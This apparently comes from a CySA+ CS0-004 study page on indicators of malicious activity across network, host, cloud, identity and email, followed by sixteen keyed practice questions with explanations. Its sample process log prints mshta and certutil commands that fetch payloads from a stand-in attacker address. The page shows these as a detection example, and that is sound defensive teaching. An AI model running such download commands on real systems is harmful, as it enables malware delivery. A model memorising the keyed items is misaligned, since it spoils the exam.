Triage BoardGet the app

Domain 1 · Security Operations

Indicators of malicious activity

Indicators of malicious activity are the network, host, cloud, identity and email signs that an attacker is present, and CS0-004 objective 1.2 tests whether you can read them in raw output. You get traffic, host activity, a cloud console, a sign-in log or a mailbox, and you decide which signal points to an attacker and what to check first.

  • Exam code CS0-004
  • Domain weight 34%
  • Tickets here 16

Seven places a signal can come from

The CS0-004 exam objectives (version 2.0, checked October 2026) sort indicators by where they appear: network, host, application, cloud, social engineering, identity and email. 1.2 is a “given a scenario” objective, so expect exhibits such as flow records, process lists and sign-in tables, both in multiple-choice items and in performance-based questions (PBQs); the guide to CySA+ PBQs describes that format.

Two items are new in CS0-004: living-off-the-land binaries (LOLBins) and business email compromise (BEC). Impossible travel moved here from the CS0-003 tools objective. Books written for CS0-003, whose English exam retires on December 22, 2026 (CompTIA’s CS0-003 page, checked October 2026), may skip the new pair. Where these signals are collected, and how far the logs can be trusted, is objective 1.1, architecture and logging.

Indicator families and the first check

Where the signal appears, what it looks like, and the benign explanation to rule out
WhereSignalsRule out firstFirst check
NetworkUnknown devices, enumeration sweeps, traffic spikes, unexpected portsAn authorized scanner or a new deploymentFlow and DNS records for the host
HostResource spikes, unknown software, odd processes, LOLBin use, file and config changesPatching and admin toolingThe process tree and parent process
ApplicationOutages, error bursts, new in-app admin accountsA release or a load peakApplication and web server logs
CloudNew keys or roles, compute in unused regions, public storageAutoscaling, a project going liveThe provider's audit trail
Social engineeringLookalike domains, shortened linksMarketing link toolsThe expanded, full URL
IdentityImpossible travel, unusual sign-in times, new privilegesVPN or proxy egress, real travelSign-in records with device and IP
EmailPayment-change requests, lookalike senders, new forwarding rulesA genuine vendor changeHeaders and a call to a known number

A LOLBin chain in process logs

sysmonProcess-creation events from one fictional workstation (addresses from RFC 5737)
2026-10-02T09:14:03Z host=wks-114 user=EXAMPLE\jdoe event=ProcessCreate  parent=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE  image=C:\Windows\System32\mshta.exe  cmd=mshta.exe http://198.51.100.24/invoice.hta2026-10-02T09:14:09Z host=wks-114 user=EXAMPLE\jdoe event=ProcessCreate  parent=C:\Windows\System32\mshta.exe  image=C:\Windows\System32\certutil.exe  cmd=certutil.exe -urlcache -f http://198.51.100.24/u.bin C:\Users\Public\u.bin2026-10-02T09:14:10Z host=wks-114 event=NetworkConnect image=certutil.exe dst=198.51.100.24:80

Every binary here ships with Windows and is signed by Microsoft. The indicators are the parent and the arguments: a word processor has no reason to start mshta, and certutil is a certificate utility, so a URL in its command line means a download. The LOLBAS project catalogs such binaries.

Reading each family

Network

Network indicators are deviations from a baseline: a sweep of ARP or ping requests across a subnet, an LDAP query that lists every group, a print server opening outbound SSH. Volume alone proves little; a volume change on a host whose role does not explain it is the finding. DNS deserves its own look, and the three DNS patterns candidates confuse are compared in DNS tunneling vs DGA vs fast flux.

Host

On a host, look for change: a new service, a disabled firewall profile, an altered audit policy, thousands of files renamed with one new extension within minutes, or large archives appearing in a temp folder before an upload. LOLBins (rundll32, regsvr32, bitsadmin, PowerShell and the two above) blend in because the binary is legitimate; the parent process and arguments give them away.

Application and cloud

Application signals are service disruption, error bursts and accounts the application never had. In the cloud, watch for new access keys or roles, compute launched in a region the company does not use, and storage switched to public. The provider's audit trail is the source of truth for who did it.

Identity

Impossible travel means two sign-ins for one account from places too far apart for the time between them, for example Chicago at 09:02 and Singapore at 09:40. Corporate VPNs, cloud proxies and virtual desktops produce the same pattern for innocent users, so confirm the egress path before you call it compromise. Microsoft documents the detection in its Entra ID Protection risk detections.

Email and social engineering

BEC usually carries no attachment and often no link. The message asks for a payment change or a transfer, sometimes from a real but compromised mailbox, so SPF, DKIM and DMARC can all pass (DMARC is defined in RFC 7489). Typosquatting relies on a name one glyph off, such as rnail.example (r plus n) for mail.example; a URL shortener hides the destination until you expand it.

Signed does not mean safeTrap

A distractor in this objective will point to the Microsoft signature on a binary as proof that it is harmless. LOLBins are dangerous because they are signed and trusted. Judge the chain (who started the process and with which arguments) and then follow it with the tools in tools that find malicious activity.

Terms that look alike

Anomaly
A deviation from baseline. It may be benign; it becomes an indicator once a malicious explanation fits better.
Indicator of compromise (IoC)
Evidence that an intrusion has already happened. How long an IoC stays useful is the subject of the Pyramid of Pain.
Impossible travel
Two sign-ins too far apart for the time between them.
Unfamiliar sign-in location
One sign-in from somewhere new. Weaker on its own and common for travelers.
Phishing
Mass or targeted lures that harvest credentials or deliver malware.
Business email compromise
A fraud that aims at a payment or data transfer, often with no payload at all.

Tickets: read the signal

Flow tables, sign-in logs and process traces make up the exhibits in this queue. Work out what happened on the host or the account, then answer.

Ticket 1 / 16

0 right

INC-001

An analyst must detect low-volume periodic beaconing in sparse network traffic. Which statistical method is most suitable for identifying the periodicity?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: B

  1. ALinear regression fits a trend in byte counts over time; it finds growth or decline, not a repeating interval.
  2. BCorrect: Autocorrelation compares the traffic series with time-shifted copies of itself, so a regular call-back interval shows up as a peak even when connections are few and small.
  3. CA moving-average threshold flags volume spikes, but low-volume beacons never cross a volume threshold, so their periodicity stays hidden.
  4. DRanking daily totals by percentile hides timing inside the day, so a small periodic beacon looks like ordinary low traffic.

INC-002

A sandbox PCAP summary shows periodic callbacks from an infected host with timestamps at 20s, 41s, 59s, 82s, and 101s. What does the pattern indicate?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: D

  1. AHuman browsing is bursty and irregular, not a steady call-out every 18–23 seconds.
  2. BScheduled backups run at fixed, infrequent times and move large amounts of data, which looks nothing like small callbacks every 20 seconds.
  3. CUpdate checks usually run every few hours or once a day against known vendor servers, far less often than every 20 seconds.
  4. DCorrect: The gaps are about 20 seconds with small random variation (21, 18, 23, 19 s), which matches C2 beaconing with jitter added to avoid exact-interval detection.

INC-003

A SOC analyst reviews netflow records from a server scheduled for nightly backups at 02:00 UTC. Which flow is the strongest indicator of data exfiltration?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: A

  1. ACorrect: 12 GB going to an external address over 443, just outside the 02:00 backup window, doesn't match the known backup pattern and looks like exfiltration hidden in encrypted web traffic.
  2. B45 GB at exactly 02:00 to an internal 10.x host over SSH matches the scheduled backup to an internal target.
  3. C180 MB to an internal 192.168.x host is a small, internal transfer and is far weaker evidence of data leaving the organization.
  4. DThis flow is inbound from the outside, so it brings data in; it can't be data leaving the network.

INC-004

Examine the TLS session metadata. Which session most likely indicates data tunneling or exfiltration?

Exhibit

SessionSNICert IssuerDuration (min)Bytes Out
1search.example.netGlobalSign12450000
2api.saas-vendor.exampleSectigo8320000
3updates.cdn-fast.exampleUnknown CA18512500000
4login.corp.example.comDigiCert25890000

Pick an option to open the notes on all of them.

Key and notes on every option

Key: B

  1. ASession 2 goes to a SaaS vendor API with a trusted issuer and modest outbound volume.
  2. BCorrect: session 3 runs for over three hours, sends about 12.5 MB out and presents a certificate from an unknown CA on an odd CDN-style name, which together point to tunneling or exfiltration even though the payload is encrypted.
  3. CSession 4 is a corporate login host with a DigiCert certificate and ordinary duration and volume.
  4. DSession 1 is short traffic to a search site with a trusted issuer and normal byte counts.

INC-005

A security analyst is reviewing cloud audit logs against an approved runbook inventory to identify unauthorized automation. Based on the provided comparison, which observed event is malicious?

Exhibit

Event IDAssumed RoleSource IPExecuted APIApproved Subnet
E1BackupRole10.0.5.50CreateSnapshot10.0.5.0/24
E2DeployRole192.168.1.15UpdateFunctionCode192.168.1.0/24
E3SecAuditRole203.0.113.45ListBuckets10.0.0.0/8
E4DataSyncRole172.16.0.5PutObject172.16.0.0/16

Pick an option to open the notes on all of them.

Key and notes on every option

Key: C

  1. AE4 comes from 172.16.0.5, which sits inside its approved 172.16.0.0/16 range, so it matches the runbook.
  2. BE1 comes from 10.0.5.50, inside its approved 10.0.5.0/24 subnet, so the snapshot fits the runbook.
  3. CCorrect: SecAuditRole was assumed from the public address 203.0.113.45, outside its approved 10.0.0.0/8 range, so this is the only event that breaks the runbook and should be treated as unauthorized use of the role.
  4. DE2 comes from 192.168.1.15, inside its approved 192.168.1.0/24 subnet, so the code update matches the runbook.

INC-006

An incident response report incorrectly states that an adversary interactively logged into the management console. Which critical log analysis oversight likely caused this misattribution?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: B

  1. AThe question is about misreading who performed an action, and decoding a network payload has nothing to do with telling a human console login from an API call.
  2. BCorrect: The same API action can come from an interactive user or from an automated role or access key, so skipping the check of principal type can turn automated API use into a false 'logged into the console' finding.
  3. CGeographic origin shows where the request came from but cannot tell an interactive console login from an API call.
  4. DMatching a user agent to the wrong IP is a correlation error, yet the misattribution here concerns the type of principal instead of the source address.

INC-007

An analyst is investigating an authentication sequence to determine if an account was compromised. Based on the provided authentication log, at which timestamp did the attacker successfully establish an active session bypassing MFA?

Exhibit

TimestampEvent TypeIP AddressDevice FingerprintResult
08:12:01Password Auth192.0.2.45Unknown-Win10Success
08:12:03MFA Push192.0.2.45Unknown-Win10Denied
08:12:05MFA Push192.0.2.45Unknown-Win10Denied
08:12:07MFA Push192.0.2.45Unknown-Win10Success
08:14:22Token Access198.51.100.12Unknown-MacSuccess

Pick an option to open the notes on all of them.

Key and notes on every option

Key: D

  1. A08:12:05 is a denied push, so no session was created at that point.
  2. B08:12:01 is only the password step; MFA was still required, so there was no active session yet.
  3. C08:14:22 is a later use of the already-issued token from another IP and device, so it happens after access was gained and is not the moment MFA was defeated.
  4. DCorrect: After two denied pushes, the push approved at 08:12:07 from the same unknown device is the MFA-fatigue success that gives the attacker an active session.

INC-008

A CASB alerted on unusual data egress. Review the SaaS telemetry table. Which scenario best explains the correlation between the recent token grants and the subsequent high-volume data exfiltration?

Exhibit

UserApp NameScopes GrantedSubsequent Data Egress Volume
J.DoeProductivityPlusMail.Read, Files.ReadAll50 MB
A.SmithPDF_Converter_ProFiles.ReadWrite.All450 GB
M.LeeInternalHRAppUser.Read.All5 MB

Pick an option to open the notes on all of them.

Key and notes on every option

Key: C

  1. AA manual backup would go to corporate storage and would not need a newly consented third-party app with tenant-wide file access.
  2. BCredential stuffing gives access to the account itself, while the telemetry here shows a third-party app being granted permissions without any password login.
  3. CCorrect: A.Smith granted an unfamiliar app ('PDF_Converter_Pro') the broad Files.ReadWrite.All scope, then 450 GB left, which is the pattern of OAuth consent phishing.
  4. DA PDF converter has no routine reason to sync hundreds of gigabytes, and the volume is far above the other apps.

INC-009

An analyst is reviewing authentication logs for a suspected compromised account. Based on the logs provided, which mechanism did the attacker use to bypass modern authentication controls?

Exhibit

TimestampProtocol UsedClient AppMFA EnforcedResult
10:01SAMLWeb BrowserYFailed (MFA timeout)
10:02SAMLWeb BrowserYFailed (MFA denied)
10:05IMAPMailClientNSuccess

Pick an option to open the notes on all of them.

Key and notes on every option

Key: D

  1. AThe log shows no SMS or one-time code, only push or MFA timeouts and denials, then a login with no MFA at all.
  2. BSession hijacking reuses an existing authenticated session, but here a fresh login succeeded over a different protocol.
  3. CA persistent browser token would show up as a browser session, but the successful access came from a mail client over IMAP.
  4. DCorrect: After the browser (SAML) logins failed at MFA, the attacker logged in over IMAP, a legacy protocol where MFA was not enforced, which is why legacy authentication should be blocked.

INC-010

While analyzing logs from your organization's web server, you identify a series of suspicious actions suggesting typical malicious activities. Which technique used by attackers involves gaining high-level access to systems after compromising low-level accounts?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: B

  1. ALateral movement means moving from one system to others; the stem describes gaining higher rights after a low-level account is compromised.
  2. BCorrect: privilege escalation is turning a low-level foothold into higher access such as administrator or root.
  3. CDefense evasion, which ATT&CK v19 splits into Stealth and Defense Impairment, is about hiding from or disabling security controls; it does not raise an account's privileges.
  4. DCommand and control is how the attacker talks to compromised systems; raising access level is privilege escalation.

INC-011

Which artifacts indicate in-memory-only credential theft during an investigation?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: D

  1. AOutbound flow records show network movement and cannot reveal credential theft carried out entirely in memory.
  2. BA new scheduled task is a persistence artifact written to disk, which in-memory-only credential theft by definition avoids.
  3. CDisk logs of file changes miss attacks that never touch disk, which is exactly what memory-only theft is.
  4. DCorrect: In-memory credential theft shows up as unusual access to the LSASS process and as stolen or forged Kerberos tickets in memory, so you need memory analysis to see it.

INC-012

A cybersecurity analyst observed unusual CPU usage in a server. This may be a sign of which of the following types of attacks?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: C

  1. ASQL injection shows up as odd queries and database errors in application logs, and it does not usually drive sustained high CPU.
  2. BPhishing is a social-engineering delivery method spotted in email and user reports; it doesn't by itself drive up server CPU.
  3. CCorrect: Cryptomining (cryptojacking) uses the victim's processor to mine coins, so unexplained, sustained high CPU usage is a classic sign of it.
  4. DA man-in-the-middle attack shows up as traffic anomalies such as certificate warnings or ARP/DNS spoofing, with no reason to push server CPU high.

INC-013

While reviewing security logs, you observe repeated attempts to access TCP port 3389 on multiple machines within your network. What could this indicate?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: A

  1. ACorrect: TCP 3389 is the Remote Desktop Protocol port, so repeated connection attempts across many machines suggest RDP brute forcing or password spraying.
  2. BSQL injection travels through web application input to a database and would never appear as connection attempts to port 3389.
  3. CEmail-borne malware arrives through mail, so it does not explain repeated inbound attempts to the RDP port.
  4. DFTP uses ports 20 and 21; attempts on 3389 target RDP.

INC-014

A security analyst discovered a smartphone in a restricted area of a company's premises. The smartphone was logged into a guest Wi-Fi network, but the analyst was unable to access the device or determine its owner. This device is an example of which of the following?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: B

  1. AA keylogger records keystrokes as software or a small hardware dongle on a computer, which is a different thing from an unknown phone on the guest Wi-Fi.
  2. BCorrect: An unknown, unmanaged device found in a restricted area is a rogue device, whatever network it is joined to.
  3. CA firewall is a security control that filters traffic, so it cannot be the unidentified device.
  4. DPhishing is a deceptive message designed to trick users, and nothing about it involves a physical device found on the premises.

INC-015

An administrator notices that an unauthorized program is listening on a system’s network port, which they did not install or configure. Which term describes this type of network-related indicator of an infection that has occurred?

Pick an option to open the notes on all of them.

Key and notes on every option

Key: A

  1. ACorrect: A program listening on a port that no administrator installed is an unauthorized listening service, often a backdoor waiting for inbound connections.
  2. BUnusual outbound traffic is about data leaving the host, while the stem describes a port opened for incoming connections.
  3. CUnrecognized processes is a host-based indicator; the stem asks for the network-related one, which is the open listening port.
  4. DAn unexpected shutdown is an availability symptom and has nothing to do with a program listening on a port.

INC-016

An analyst reviews a process monitoring log captured during the detonation of an unknown executable. Based on the host activity detailed in the table, which event sequence most strongly indicates the malware is establishing persistence on the system?

Exhibit

TimeProcess NameOperationPath / Target
11:00:15malware.exeCreateFileC:\Windows\System32\kernel32.dll
11:00:18malware.exeRegSetValueHKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater
11:00:20malware.exeCreateMutex\BaseNamedObjects\MalwareMutex_12345
11:00:25malware.exeWriteFileC:\Users\Admin\AppData\Local\Temp\drop.tmp

Pick an option to open the notes on all of them.

Key and notes on every option

Key: C

  1. AWriting a temp file in AppData is a typical dropper step, but a temp file alone doesn't make the malware run again after reboot.
  2. BA mutex keeps the malware from running twice on the same host; it coordinates execution but does not make the malware survive a reboot.
  3. CCorrect: Writing a value under ...\CurrentVersion\Run makes the program start at every user logon, a classic persistence technique (registry run keys).
  4. DTouching kernel32.dll is ordinary system library access that almost every Windows program does, so it proves no persistence.

Shift tally

0 / 0

Indicators in practice

Will I see LOLBins on CS0-004?

Yes. Living-off-the-land binaries are named in objective 1.2 of the CS0-004 exam objectives (version 2.0, checked October 2026). Expect to judge a command line or a parent-child process pair.

How do I tell objective 1.2 apart from objective 1.3?

1.2 asks what a signal means. 1.3 asks which tool or command reveals it; that side is covered in the analysis tools guide.

What happens to an indicator once I have confirmed it?

Into detections, blocklists and shared intelligence. Grading and sharing them is part of threat intelligence and threat hunting.

How can I practice reading indicators?

On mixed sets where indicator tickets sit among the other domains, as in the CySA+ practice test. Read each exhibit before the options.

Keep the queue going on your phone

Our practice app carries CySA+ questions to your phone, on iPhone and Android.